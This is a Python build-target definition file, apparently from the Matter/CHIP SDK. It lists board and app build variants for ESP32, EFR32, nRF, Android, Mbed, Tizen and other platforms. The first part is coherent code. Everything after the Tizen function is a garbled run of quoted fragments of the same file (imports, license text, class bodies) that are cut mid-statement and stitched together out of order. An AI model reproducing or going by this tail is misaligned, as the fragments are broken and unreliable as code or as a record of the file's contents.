                               use_platform_mdns=True, enable_ipv4=False).GlobBlacklist("Reduce default build variants")

    test_target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder)
    for board in [HostBoard.NATIVE, HostBoard.FAKE]:
        yield test_target.Extend(board.BoardName() + '-tests', board=board, app=HostApp.TESTS)
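
# Note, for illustration: because AllVariants() emits every non-conflicting
# combination of the variants registered above, HostTargets() can yield names
# such as 'linux-x64-chip-tool-ipv6only-clang'; only the whitelisted variant
# suffixes stay eligible for glob-style 'build all' selection.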

def Esp32Targets():
    esp32_target = Target('esp32', Esp32Builder)

    yield esp32_target.Extend('m5stack-all-clusters', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS)
    yield esp32_target.Extend('m5stack-all-clusters-ipv6only', board=Esp32Board.M5Stack,
                              app=Esp32App.ALL_CLUSTERS, enable_ipv4=False)
    yield esp32_target.Extend('m5stack-all-clusters-rpc', board=Esp32Board.M5Stack,
                              app=Esp32App.ALL_CLUSTERS, enable_rpcs=True)
    yield esp32_target.Extend('m5stack-all-clusters-rpc-ipv6only', board=Esp32Board.M5Stack,
                              app=Esp32App.ALL_CLUSTERS, enable_rpcs=True, enable_ipv4=False)

    yield esp32_target.Extend('c3devkit-all-clusters', board=Esp32Board.C3DevKit, app=Esp32App.ALL_CLUSTERS)

    devkitc = esp32_target.Extend('devkitc', board=Esp32Board.DevKitC)

    yield devkitc.Extend('all-clusters', app=Esp32App.ALL_CLUSTERS)
    yield devkitc.Extend('all-clusters-ipv6only', app=Esp32App.ALL_CLUSTERS, enable_ipv4=False)
    yield devkitc.Extend('shell', app=Esp32App.SHELL)
    yield devkitc.Extend('light', app=Esp32App.LIGHT)
    yield devkitc.Extend('lock', app=Esp32App.LOCK)
    yield devkitc.Extend('bridge', app=Esp32App.BRIDGE)
    yield devkitc.Extend('temperature-measurement', app=Esp32App.TEMPERATURE_MEASUREMENT)
    yield devkitc.Extend('temperature-measurement-rpc', app=Esp32App.TEMPERATURE_MEASUREMENT, enable_rpcs=True)

    yield esp32_target.Extend('qemu-tests', board=Esp32Board.QEMU, app=Esp32App.TESTS)

def Efr32Targets():
    efr_target = Target('efr32', Efr32Builder)

    board_targets = [
        efr_target.Extend('brd4161a', board=Efr32Board.BRD4161A),
        efr_target.Extend('brd4163a', board=Efr32Board.BRD4163A).GlobBlacklist('only user requested'),
        efr_target.Extend('brd4164a', board=Efr32Board.BRD4164A).GlobBlacklist('only user requested'),
        efr_target.Extend('brd4166a', board=Efr32Board.BRD4166A).GlobBlacklist('only user requested'),
        efr_target.Extend('brd4170a', board=Efr32Board.BRD4170A).GlobBlacklist('only user requested'),
        efr_target.Extend('brd4186a', board=Efr32Board.BRD4186A).GlobBlacklist('only user requested'),
        efr_target.Extend('brd4187a', board=Efr32Board.BRD4187A).GlobBlacklist('only user requested'),
        efr_target.Extend('brd4304a', board=Efr32Board.BRD4304A).GlobBlacklist('only user requested'),
    ]

    builder = VariantBuilder()

    for board_target in board_targets:
        builder.targets.append(board_target.Extend('window-covering', app=Efr32App.WINDOW_COVERING))
        builder.targets.append(board_target.Extend('switch', app=Efr32App.SWITCH))
        builder.targets.append(board_target.Extend('unit-test', app=Efr32App.UNIT_TEST))
        builder.targets.append(board_target.Extend('light', app=Efr32App.LIGHT))
        builder.targets.append(board_target.Extend('lock', app=Efr32App.LOCK))

    # Possible build variants. Note that number of potential
    # builds is exponential here
    builder.AppendVariant(name="rpc", validator=AcceptNameWithSubstrings(['-light', '-lock']), enable_rpcs=True)
    builder.AppendVariant(name="with-ota-requestor", enable_ota_requestor=True)

    builder.WhitelistVariantNameForGlob('rpc')

    for target in builder.AllVariants():
        yield target

def NrfTargets():
    target = Target('nrf', NrfConnectBuilder)

    yield target.Extend('native-posix-64-tests', board=NrfBoard.NATIVE_POSIX_64, app=NrfApp.UNIT_TESTS)

    targets = [
        target.Extend('nrf5340dk', board=NrfBoard.NRF5340DK),
        target.Extend('nrf52840dk', board=NrfBoard.NRF52840DK),
    ]

    # Enable nrf52840dongle for all-clusters and lighting app only
    yield target.Extend('nrf52840dongle-all-clusters', board=NrfBoard.NRF52840DONGLE, app=NrfApp.ALL_CLUSTERS)
    yield target.Extend('nrf52840dongle-light', board=NrfBoard.NRF52840DONGLE, app=NrfApp.LIGHT)

    for target in targets:
        yield target.Extend('all-clusters', app=NrfApp.ALL_CLUSTERS)
        yield target.Extend('lock', app=NrfApp.LOCK)
        yield target.Extend('light', app=NrfApp.LIGHT)
        yield target.Extend('shell', app=NrfApp.SHELL)
        yield target.Extend('pump', app=NrfApp.PUMP)
        yield target.Extend('pump-controller', app=NrfApp.PUMP_CONTROLLER)

        rpc = target.Extend('light-rpc', app=NrfApp.LIGHT, enable_rpcs=True)

        if '-nrf5340dk-' in rpc.name:
            rpc = rpc.GlobBlacklist(
                'Compile failure due to pw_build args not forwarded to proto compiler. '
                'https://pigweed-review.googlesource.com/c/pigweed/pigweed/+/66760')

        yield rpc

def AndroidTargets():
    target = Target('android', AndroidBuilder)

    yield target.Extend('arm-chip-tool', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('arm64-chip-tool', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('x64-chip-tool', board=AndroidBoard.X64, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('x86-chip-tool', board=AndroidBoard.X86, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('arm64-chip-test', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TEST)
    yield target.Extend('androidstudio-arm-chip-tool', board=AndroidBoard.AndroidStudio_ARM, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('androidstudio-arm64-chip-tool', board=AndroidBoard.AndroidStudio_ARM64, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('androidstudio-x86-chip-tool', board=AndroidBoard.AndroidStudio_X86, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('androidstudio-x64-chip-tool', board=AndroidBoard.AndroidStudio_X64, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('arm64-chip-tvserver', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TVServer)
    yield target.Extend('arm-chip-tvserver', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TVServer)
    yield target.Extend('x86-chip-tvserver', board=AndroidBoard.X86, app=AndroidApp.CHIP_TVServer)
    yield target.Extend('x64-chip-tvserver', board=AndroidBoard.X64, app=AndroidApp.CHIP_TVServer)
    yield target.Extend('arm64-chip-tv-casting-app', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TV_CASTING_APP)
    yield target.Extend('arm-chip-tv-casting-app', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TV_CASTING_APP)

def MbedTargets():
    target = Target('mbed', MbedBuilder)

    targets = [
        target.Extend('CY8CPROTO_062_4343W', board=MbedBoard.CY8CPROTO_062_4343W),
    ]

    app_targets = []
    for target in targets:
        app_targets.append(target.Extend('lock', app=MbedApp.LOCK))
        app_targets.append(target.Extend('light', app=MbedApp.LIGHT))
        app_targets.append(target.Extend('all-clusters', app=MbedApp.ALL_CLUSTERS))
        app_targets.append(target.Extend('pigweed', app=MbedApp.PIGWEED))
        app_targets.append(target.Extend('shell', app=MbedApp.SHELL))

    for target in app_targets:
        yield target.Extend('release', profile=MbedProfile.RELEASE)
        yield target.Extend('develop', profile=MbedProfile.DEVELOP).GlobBlacklist(
            'Compile only for debugging purpose - '
            'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html')
        yield target.Extend('debug', profile=MbedProfile.DEBUG).GlobBlacklist(
            'Compile only for debugging purpose - '
            'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html')


def InfineonTargets():
    target = Target('infineon', InfineonBuilder)

    yield target.Extend('p6-lock', board=InfineonBoard.P6BOARD, app=InfineonApp.LOCK)
    yield target.Extend('p6-all-clusters', board=InfineonBoard.P6BOARD, app=InfineonApp.ALL_CLUSTERS)
    yield target.Extend('p6-light', board=InfineonBoard.P6BOARD, app=InfineonApp.LIGHT)

def AmebaTargets():
    ameba_target = Target('ameba', AmebaBuilder)

    yield ameba_target.Extend('amebad-all-clusters', board=AmebaBoard.AMEBAD, app=AmebaApp.ALL_CLUSTERS)
    yield ameba_target.Extend('amebad-light', board=AmebaBoard.AMEBAD, app=AmebaApp.LIGHT)
    yield ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD, app=AmebaApp.PIGWEED)


def K32WTargets():
    target = Target('k32w', K32WBuilder)

    yield target.Extend('light-ota-se', app=K32WApp.LIGHT, release=True,
                        disable_ble=True, se05x=True).GlobBlacklist("Only on demand build")
    yield target.Extend('light-release-no-ota', app=K32WApp.LIGHT, tokenizer=True,
                        disable_ota=True, release=True)
    yield target.Extend('shell-release', app=K32WApp.SHELL, release=True)
    yield target.Extend('lock-release', app=K32WApp.LOCK, release=True)
    yield target.Extend('lock-low-power-release', app=K32WApp.LOCK,
                        low_power=True, release=True).GlobBlacklist("Only on demand build")

def cc13x2x7_26x2x7Targets():
    target = Target('cc13x2x7_26x2x7', cc13x2x7_26x2x7Builder)

    yield target.Extend('lock-ftd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=True)
    yield target.Extend('lock-mtd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=False)
    yield target.Extend('pump', app=cc13x2x7_26x2x7App.PUMP)
    yield target.Extend('pump-controller', app=cc13x2x7_26x2x7App.PUMP_CONTROLLER)
    yield target.Extend('all-clusters', app=cc13x2x7_26x2x7App.ALL_CLUSTERS)
    yield target.Extend('shell', app=cc13x2x7_26x2x7App.SHELL)


def Cyw30739Targets():
    yield Target('cyw30739-cyw930739m2evb_01-light', Cyw30739Builder,
                 board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LIGHT)
    yield Target('cyw30739-cyw930739m2evb_01-lock', Cyw30739Builder,
                 board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LOCK)
    yield Target('cyw30739-cyw930739m2evb_01-ota-requestor', Cyw30739Builder,
                 board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR).GlobBlacklist(
        "Running out of XIP flash space")
    yield Target('cyw30739-cyw930739m2evb_01-ota-requestor-no-progress-logging', Cyw30739Builder,
                 board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR, progress_logging=False)

def QorvoTargets():
    target = Target('qpg', QpgBuilder)

    yield target.Extend('lock', board=QpgBoard.QPG6105, app=QpgApp.LOCK)
    yield target.Extend('light', board=QpgBoard.QPG6105, app=QpgApp.LIGHT)
    yield target.Extend('shell', board=QpgBoard.QPG6105, app=QpgApp.SHELL)
    yield target.Extend('persistent-storage', board=QpgBoard.QPG6105, app=QpgApp.PERSISTENT_STORAGE)


def TizenTargets():
    # Possible build variants.
    # NOTE: The number of potential builds is exponential here.
    builder = VariantBuilder()
    builder.AppendVariant(name="no-ble", enable_ble=False)
    builder.AppendVariant(name="no-wifi", enable_wifi=False)
    builder.AppendVariant(name="asan", use_asan=True)

    target = Target('tizen-arm', TizenBuilder, board=TizenBoard.ARM)
    builder.targets.append(target.Extend('light', app=TizenApp.LIGHT))

    for target in builder.AllVariants():
        yield target
items]) for item in items: for", "Single-variant builds yield target else: builder.targets.append(target) for target in builder.AllVariants():", "cc13x2x7_26x2x7Builder) yield target.Extend('lock-ftd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=True) yield target.Extend('lock-mtd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=False) yield", "board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TEST) yield target.Extend('androidstudio-arm-chip-tool', board=AndroidBoard.AndroidStudio_ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-arm64-chip-tool', board=AndroidBoard.AndroidStudio_ARM64, app=AndroidApp.CHIP_TOOL)", "app=NrfApp.LIGHT) yield target.Extend('shell', app=NrfApp.SHELL) yield target.Extend('pump', app=NrfApp.PUMP) yield target.Extend('pump-controller', app=NrfApp.PUMP_CONTROLLER)", "(what builder class to use and what arguments are required", "= VariantBuilder() # Possible build variants. Note that number of", "['-chip-tool', '-chip-tool-darwin']), separate_event_loop=False), builder.AppendVariant(name=\"no-interactive\", validator=AcceptNameWithSubstrings( ['-chip-tool']), interactive_mode=False), builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False), builder.AppendVariant(name=\"no-ble\",", "= validator self.conflicts = conflicts self.buildargs = buildargs self.requires =", "ALL.append(Target('telink-tlsr9518adk80d-light-switch', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.SWITCH)) # have a consistent order overall", "variants. # NOTE: The number of potential builds is exponential", "is exponential here builder.AppendVariant(name=\"same-event-loop\", validator=AcceptNameWithSubstrings( ['-chip-tool', '-chip-tool-darwin']), separate_event_loop=False), builder.AppendVariant(name=\"no-interactive\", validator=AcceptNameWithSubstrings(", "v.validator.Accept(target.name)] # Build every possible variant for variant_count in range(1,", "and lighting app only yield target.Extend('nrf52840dongle-all-clusters', board=NrfBoard.NRF52840DONGLE, app=NrfApp.ALL_CLUSTERS) yield target.Extend('nrf52840dongle-light',", "AmebaBuilder from builders.android import AndroidApp, AndroidBoard, AndroidBuilder from builders.cc13x2x7_26x2x7 import", "separate_event_loop=False), builder.AppendVariant(name=\"no-interactive\", validator=AcceptNameWithSubstrings( ['-chip-tool']), interactive_mode=False), builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False), builder.AppendVariant(name=\"no-ble\", enable_ble=False), builder.AppendVariant(name=\"no-wifi\",", "import Efr32App, Efr32Board, Efr32Builder from builders.esp32 import Esp32App, Esp32Board, Esp32Builder", "forwarded to proto compiler. 
' 'https://pigweed-review.googlesource.com/c/pigweed/pigweed/+/66760') yield rpc def AndroidTargets():", "cross_compile and 'chip-tool' in target.name and 'arm64' in target.name and", "target.Extend('nrf52840dk', board=NrfBoard.NRF52840DK), ] # Enable nrf52840dongle for all-clusters and lighting", "low_power=True, release=True).GlobBlacklist(\"Only on demand build\") def cc13x2x7_26x2x7Targets(): target = Target('cc13x2x7_26x2x7',", "target.Clone() for option in subgroup: variant_target = variant_target.Extend( option.name, **option.buildargs)", "output_prefix: str, enable_flashbundle: bool): builder = self.builder_class( repository_path, runner=runner, **self.create_kw_args)", "target.Extend('all-clusters-app-release', app=IMXApp.ALL_CLUSTERS, release=True) yield target.Extend('ota-provider-app-release', app=IMXApp.OTA_PROVIDER, release=True) ALL = []", "for target in builder.AllVariants(): yield target def NrfTargets(): target =", "= VariantBuilder() for board_target in board_targets: builder.targets.append(board_target.Extend( 'window-covering', app=Efr32App.WINDOW_COVERING)) builder.targets.append(board_target.Extend(", "'only user requested'), efr_target.Extend('brd4166a', board=Efr32Board.BRD4166A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4170a', board=Efr32Board.BRD4170A).GlobBlacklist(", "builder.AppendVariant(name=\"no-interactive\", validator=AcceptNameWithSubstrings( ['-chip-tool']), interactive_mode=False), builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False), builder.AppendVariant(name=\"no-ble\", enable_ble=False), builder.AppendVariant(name=\"no-wifi\", enable_wifi=False),", "return clone def Create(self, runner, repository_path: str, output_prefix: str, enable_flashbundle:", "False class BuildVariant: def __init__(self, name: str, validator=AcceptAnyName(), conflicts: List[str]", "target.Extend('androidstudio-arm64-chip-tool', board=AndroidBoard.AndroidStudio_ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x86-chip-tool', board=AndroidBoard.AndroidStudio_X86, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x64-chip-tool', board=AndroidBoard.AndroidStudio_X64,", "target_native.Extend('address-resolve-tool-platform-mdns-ipv6only', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True, enable_ipv4=False).GlobBlacklist(\"Reduce default build variants\") test_target = Target(HostBoard.NATIVE.PlatformName(),", "yield target.Extend('arm64-chip-tvserver', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm-chip-tvserver', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TVServer) yield target.Extend('x86-chip-tvserver',", "board=Efr32Board.BRD4161A), efr_target.Extend('brd4163a', board=Efr32Board.BRD4163A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4164a', board=Efr32Board.BRD4164A).GlobBlacklist( 'only user", "target.Extend('pump-controller', app=cc13x2x7_26x2x7App.PUMP_CONTROLLER) yield target.Extend('all-clusters', app=cc13x2x7_26x2x7App.ALL_CLUSTERS) yield target.Extend('shell', app=cc13x2x7_26x2x7App.SHELL) def Cyw30739Targets():", "def Bl602Targets(): target = Target('bl602', Bl602Builder) yield target.Extend('light', board=Bl602Board.BL602BOARD, app=Bl602App.LIGHT)", "os.path.join(output_prefix, self.name) builder.enable_flashbundle(enable_flashbundle) return builder def GlobBlacklist(self, reason): clone =", "'https://pigweed-review.googlesource.com/c/pigweed/pigweed/+/66760') yield rpc def AndroidTargets(): target = Target('android', AndroidBuilder) yield", "str, 
validator=AcceptAnyName(), conflicts: List[str] = [], requires: List[str] = [],", "app=TelinkApp.LIGHT)) ALL.append(Target('telink-tlsr9518adk80d-light-switch', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.SWITCH)) # have a consistent order", "target_native.Extend('address-resolve-tool-clang', app=HostApp.ADDRESS_RESOLVE, use_clang=True).GlobBlacklist(\"Reduce default build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True).GlobBlacklist(\"Reduce", "None self.create_kw_args = kwargs def Clone(self): \"\"\"Creates a clone of", "item in items: for requirement in item.requires: if requirement not", "ANY KIND, either express or implied. # See the License", "= Target('ameba', AmebaBuilder) yield ameba_target.Extend('amebad-all-clusters', board=AmebaBoard.AMEBAD, app=AmebaApp.ALL_CLUSTERS) yield ameba_target.Extend('amebad-light', board=AmebaBoard.AMEBAD,", "the License. # You may obtain a copy of the", "board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield esp32_target.Extend('m5stack-all-clusters-rpc', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True) yield esp32_target.Extend('m5stack-all-clusters-rpc-ipv6only',", "build variants and globbing whitelist targets. \"\"\" for target in", "# See the License for the specific language governing permissions", "self.name builder.output_dir = os.path.join(output_prefix, self.name) builder.enable_flashbundle(enable_flashbundle) return builder def GlobBlacklist(self,", "build) \"\"\" def __init__(self, name, builder_class, **kwargs): self.name = name", "yield target.Extend('arm64-chip-tool', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x64-chip-tool', board=AndroidBoard.X64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x86-chip-tool',", "targets. Handles conflict resolution between build variants and globbing whitelist", "app_targets.append(target.Extend('shell', app=HostApp.SHELL)) app_targets.append(target.Extend( 'ota-provider', app=HostApp.OTA_PROVIDER, enable_ble=False)) app_targets.append(target.Extend( 'ota-requestor', app=HostApp.OTA_REQUESTOR, enable_ble=False))", "yield target.Extend('ota-provider-app-release', app=IMXApp.OTA_PROVIDER, release=True) ALL = [] target_generators = [", "release=True) yield target.Extend('lock-low-power-release', app=K32WApp.LOCK, low_power=True, release=True).GlobBlacklist(\"Only on demand build\") def", "'Compile only for debugging purpose - ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') def InfineonTargets():", "are required to produce the specified build) \"\"\" def __init__(self,", "app=Efr32App.LIGHT)) builder.targets.append(board_target.Extend('lock', app=Efr32App.LOCK)) # Possible build variants. 
Note that number", "= self.Clone() if clone.glob_blacklist_reason: clone.glob_blacklist_reason += \", \" clone.glob_blacklist_reason +=", "= Target('android', AndroidBuilder) yield target.Extend('arm-chip-tool', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tool', board=AndroidBoard.ARM64,", "app_targets: if ('-rpc-console' in target.name) or ('-python-bindings' in target.name) or", "= [] self.glob_whitelist = [] def WhitelistVariantNameForGlob(self, name): \"\"\" Whitelist", "board=board, app=HostApp.TESTS) def Esp32Targets(): esp32_target = Target('esp32', Esp32Builder) yield esp32_target.Extend('m5stack-all-clusters',", "item.requires is satisfied for all items in the given list", "yield target.Extend('shell', app=cc13x2x7_26x2x7App.SHELL) def Cyw30739Targets(): yield Target('cyw30739-cyw930739m2evb_01-light', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LIGHT)", "of XIP flash space\") yield Target('cyw30739-cyw930739m2evb_01-ota-requestor-no-progress-logging', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR, progress_logging=False)", "variants\") test_target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder) for board in [HostBoard.NATIVE, HostBoard.FAKE]:", "# Don't cross compile some builds app_targets.append( target_native.Extend('rpc-console', app=HostApp.RPC_CONSOLE)) app_targets.append(", "for debugging purpose - ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') yield target.Extend('debug', profile=MbedProfile.DEBUG).GlobBlacklist( 'Compile", "Bl602App, Bl602Board, Bl602Builder from builders.imx import IMXApp, IMXBuilder class Target:", "app=Esp32App.TEMPERATURE_MEASUREMENT, enable_rpcs=True) yield esp32_target.Extend('qemu-tests', board=Esp32Board.QEMU, app=Esp32App.TESTS) def Efr32Targets(): efr_target =", "builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False), builder.AppendVariant(name=\"no-ble\", enable_ble=False), builder.AppendVariant(name=\"no-wifi\", enable_wifi=False), builder.AppendVariant(name=\"tsan\", conflicts=['asan'], use_tsan=True), builder.AppendVariant(name=\"asan\",", "self.glob_blacklist_reason return clone def Extend(self, suffix, **kargs): \"\"\"Creates a clone", "target.Extend('arm64-chip-tvserver', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm-chip-tvserver', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TVServer) yield target.Extend('x86-chip-tvserver', board=AndroidBoard.X86,", "= Target('mbed', MbedBuilder) targets = [ target.Extend('CY8CPROTO_062_4343W', board=MbedBoard.CY8CPROTO_062_4343W), ] app_targets", "in builder.AllVariants(): if cross_compile and 'chip-tool' in target.name and 'arm64'", "Licensed under the Apache License, Version 2.0 (the \"License\"); #", "Authors # # Licensed under the Apache License, Version 2.0", "import TelinkApp, TelinkBoard, TelinkBuilder from builders.tizen import TizenApp, TizenBoard, TizenBuilder", "Target: \"\"\"Represents a build target: Has a name identifier plus", "default build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True).GlobBlacklist(\"Reduce default build variants\")", "repository_path: str, output_prefix: str, enable_flashbundle: bool): builder = self.builder_class( repository_path,", "ALL = [] target_generators = [ HostTargets(), Esp32Targets(), Efr32Targets(), NrfTargets(),", "writing, software # distributed under the License is distributed 
on", "target in self.targets: yield target # skip variants that do", "a, b in combinations(items, 2): if (a.name in b.conflicts) or", "# limitations under the License. import os from itertools import", "+ suffix clone.create_kw_args.update(kargs) return clone def Create(self, runner, repository_path: str,", "user requested') ] builder = VariantBuilder() for board_target in board_targets:", "if s in name: return True return False class BuildVariant:", "IMXTargets(), ] for generator in target_generators: for target in generator:", "[] target_generators = [ HostTargets(), Esp32Targets(), Efr32Targets(), NrfTargets(), AndroidTargets(), MbedTargets(),", "else: yield target # Without extra build variants yield target_native.Extend('chip-cert',", "= self.builder_class( repository_path, runner=runner, **self.create_kw_args) builder.target = self builder.identifier =", "exponential here builder.AppendVariant(name=\"same-event-loop\", validator=AcceptNameWithSubstrings( ['-chip-tool', '-chip-tool-darwin']), separate_event_loop=False), builder.AppendVariant(name=\"no-interactive\", validator=AcceptNameWithSubstrings( ['-chip-tool']),", "app=HostApp.CHIP_TOOL)) app_targets.append(target.Extend('thermostat', app=HostApp.THERMOSTAT)) app_targets.append(target.Extend('minmdns', app=HostApp.MIN_MDNS)) app_targets.append(target.Extend('light', app=HostApp.LIGHT)) app_targets.append(target.Extend('lock', app=HostApp.LOCK)) app_targets.append(target.Extend('shell',", "of potential builds is exponential here. builder = VariantBuilder() builder.AppendVariant(name=\"no-ble\",", "use_clang=True), builder.AppendVariant(name=\"test\", extra_tests=True), builder.WhitelistVariantNameForGlob('no-interactive-ipv6only') builder.WhitelistVariantNameForGlob('ipv6only') for target in app_targets: if", "License. import os from itertools import combinations from typing import", "target = Target('tizen-arm', TizenBuilder, board=TizenBoard.ARM) builder.targets.append(target.Extend('light', app=TizenApp.LIGHT)) for target in", "HostBoard, HostBuilder from builders.infineon import InfineonApp, InfineonBoard, InfineonBuilder from builders.k32w", "board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LOCK) yield Target('cyw30739-cyw930739m2evb_01-ota-requestor', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR).GlobBlacklist( \"Running out of", "app=IMXApp.ALL_CLUSTERS, release=True) yield target.Extend('ota-provider-app-release', app=IMXApp.OTA_PROVIDER, release=True) ALL = [] target_generators", "esp32_target.Extend('m5stack-all-clusters-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield esp32_target.Extend('m5stack-all-clusters-rpc', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True) yield", "yield target.Extend('arm64-chip-tv-casting-app', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TV_CASTING_APP) yield target.Extend('arm-chip-tv-casting-app', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TV_CASTING_APP) def MbedTargets():", "list of acceptable variants for the given targets. 
Handles conflict", "yield target.Extend('p6-light', board=InfineonBoard.P6BOARD, app=InfineonApp.LIGHT) def AmebaTargets(): ameba_target = Target('ameba', AmebaBuilder)", "target = Target('nrf', NrfConnectBuilder) yield target.Extend('native-posix-64-tests', board=NrfBoard.NATIVE_POSIX_64, app=NrfApp.UNIT_TESTS) targets =", "Arguments: suffix: appended with a \"-\" as separator to the", "in target.name) or ('nl-test-runner' in target.name): # Single-variant builds yield", "app=MbedApp.ALL_CLUSTERS)) app_targets.append(target.Extend('pigweed', app=MbedApp.PIGWEED)) app_targets.append(target.Extend('shell', app=MbedApp.SHELL)) for target in app_targets: yield", "board=AndroidBoard.ARM, app=AndroidApp.CHIP_TVServer) yield target.Extend('x86-chip-tvserver', board=AndroidBoard.X86, app=AndroidApp.CHIP_TVServer) yield target.Extend('x64-chip-tvserver', board=AndroidBoard.X64, app=AndroidApp.CHIP_TVServer)", "= buildargs self.requires = requires def HasConflicts(items: List[BuildVariant]) -> bool:", "NrfConnectBuilder) yield target.Extend('native-posix-64-tests', board=NrfBoard.NATIVE_POSIX_64, app=NrfApp.UNIT_TESTS) targets = [ target.Extend('nrf5340dk', board=NrfBoard.NRF5340DK),", "Target(self.name, self.builder_class, **self.create_kw_args.copy()) clone.glob_blacklist_reason = self.glob_blacklist_reason return clone def Extend(self,", "compile by default on arm cross compiles # because libreadline", "bool): builder = self.builder_class( repository_path, runner=runner, **self.create_kw_args) builder.target = self", "to the clone name **kargs: arguments needed to produce the", "in items: for requirement in item.requires: if requirement not in", "for item in items: for requirement in item.requires: if requirement", "governing permissions and # limitations under the License. import os", "Target('k32w', K32WBuilder) yield target.Extend('light-ota-se', app=K32WApp.LIGHT, release=True, disable_ble=True, se05x=True).GlobBlacklist(\"Only on demand", "NrfTargets(): target = Target('nrf', NrfConnectBuilder) yield target.Extend('native-posix-64-tests', board=NrfBoard.NATIVE_POSIX_64, app=NrfApp.UNIT_TESTS) targets", "board=AndroidBoard.X86, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-test', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TEST) yield target.Extend('androidstudio-arm-chip-tool', board=AndroidBoard.AndroidStudio_ARM, app=AndroidApp.CHIP_TOOL)", "= []): # note the clone in case the default", "the given targets. Handles conflict resolution between build variants and", "app=HostApp.TV_CASTING_APP)) app_targets.append( target_native.Extend('nl-test-runner', app=HostApp.NL_TEST_RUNNER)) for target in targets: app_targets.append(target.Extend( 'all-clusters',", "VariantBuilder() # Possible build variants. 
Note that number of potential", "return False return True class VariantBuilder: \"\"\"Handles creating multiple build", "yield target.Extend('chip-tool-release', app=IMXApp.CHIP_TOOL, release=True) yield target.Extend('lighting-app-release', app=IMXApp.LIGHT, release=True) yield target.Extend('thermostat-release',", "return False class BuildVariant: def __init__(self, name: str, validator=AcceptAnyName(), conflicts:", "on arm cross compiles # because libreadline is not part", "= Target('infineon', InfineonBuilder) yield target.Extend('p6-lock', board=InfineonBoard.P6BOARD, app=InfineonApp.LOCK) yield target.Extend('p6-all-clusters', board=InfineonBoard.P6BOARD,", "board=InfineonBoard.P6BOARD, app=InfineonApp.LOCK) yield target.Extend('p6-all-clusters', board=InfineonBoard.P6BOARD, app=InfineonApp.ALL_CLUSTERS) yield target.Extend('p6-light', board=InfineonBoard.P6BOARD, app=InfineonApp.LIGHT)", "target.Extend('x64-chip-tvserver', board=AndroidBoard.X64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm64-chip-tv-casting-app', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TV_CASTING_APP) yield target.Extend('arm-chip-tv-casting-app', board=AndroidBoard.ARM,", "runner, repository_path: str, output_prefix: str, enable_flashbundle: bool): builder = self.builder_class(", 